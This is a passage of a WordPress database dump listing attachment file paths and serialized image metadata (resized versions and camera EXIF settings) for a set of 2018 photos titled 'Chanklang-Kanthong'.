(9908, 4492, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/25-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"25-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"25-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"25-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"25-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"25-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9909, 4493, '_wp_attached_file', '2018/11/31-Chanklang-Kanthong-copy.jpg'),
(9910, 4493, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/31-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"31-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"31-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"31-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"31-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"31-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9911, 4494, '_wp_attached_file', '2018/11/33-Chanklang-Kanthong-copy.jpg'),
(9912, 4494, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/33-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"33-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"33-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"33-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"33-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"33-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480528107\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"90\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9913, 4495, '_wp_attached_file', '2018/11/40-Chanklang-Kanthong-copy.jpg'),
(9914, 4495, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/40-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"40-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"40-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"40-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"40-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"40-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476989879\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9915, 4496, '_wp_attached_file', '2018/11/46-Chanklang-Kanthong-copy.jpg'),
(9916, 4496, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/46-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"46-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"46-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"46-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"46-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"46-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478701596\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9917, 4497, '_wp_attached_file', '2018/11/47-Chanklang-Kanthong-copy.jpg'),
(9918, 4497, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/47-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"47-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"47-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"47-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"47-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"47-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478800879\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"98\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:3:\"1.3\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9919, 4498, '_wp_attached_file', '2018/11/48-Chanklang-Kanthong-copy.jpg'),
(9920, 4498, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/48-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"48-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"48-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"48-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"48-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"48-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1479138126\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"19\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9921, 4499, '_wp_attached_file', '2018/11/61-Chanklang-Kanthong-copy.jpg'),
(9922, 4499, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/61-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"61-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"61-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"61-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"61-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"61-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1479060904\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9923, 4500, '_wp_attached_file', '2018/11/82-Chanklang-Kanthong-copy.jpg'),
(9924, 4500, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/82-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"82-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"82-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"82-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"82-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"82-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480960188\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9925, 4501, '_wp_attached_file', '2018/11/83-Chanklang-Kanthong-copy.jpg'),
(9926, 4501, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/83-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"83-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"83-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"83-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"83-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"83-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480630515\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:17:\"0.076923076923077\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9927, 4502, '_wp_attached_file', '2018/11/84-Chanklang-Kanthong-copy.jpg'),
(9928, 4502, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/84-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"84-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"84-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"84-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"84-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"84-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477056135\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9929, 4503, '_wp_attached_file', '2018/11/85-Chanklang-Kanthong-copy.jpg'),
(9930, 4503, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/85-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"85-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"85-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"85-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"85-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"85-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478708799\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"58\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9931, 4504, '_wp_attached_file', '2018/11/86-Chanklang-Kanthong-copy.jpg'),
(9932, 4504, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/86-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"86-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"86-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"86-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"86-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"86-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477054418\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:10:\"0.00015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9933, 4505, '_wp_attached_file', '2018/11/88-Chanklang-Kanthong-copy.jpg'),
(9934, 4505, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/88-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"88-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"88-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"88-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"88-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"88-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477570048\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9935, 4506, '_wp_attached_file', '2018/11/89-Chanklang-Kanthong-copy.jpg'),
(9936, 4506, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/89-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"89-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"89-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"89-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"89-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"89-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480609896\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:10:\"0.00015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9937, 4507, '_wp_attached_file', '2018/11/90-Chanklang-Kanthong-copy.jpg'),
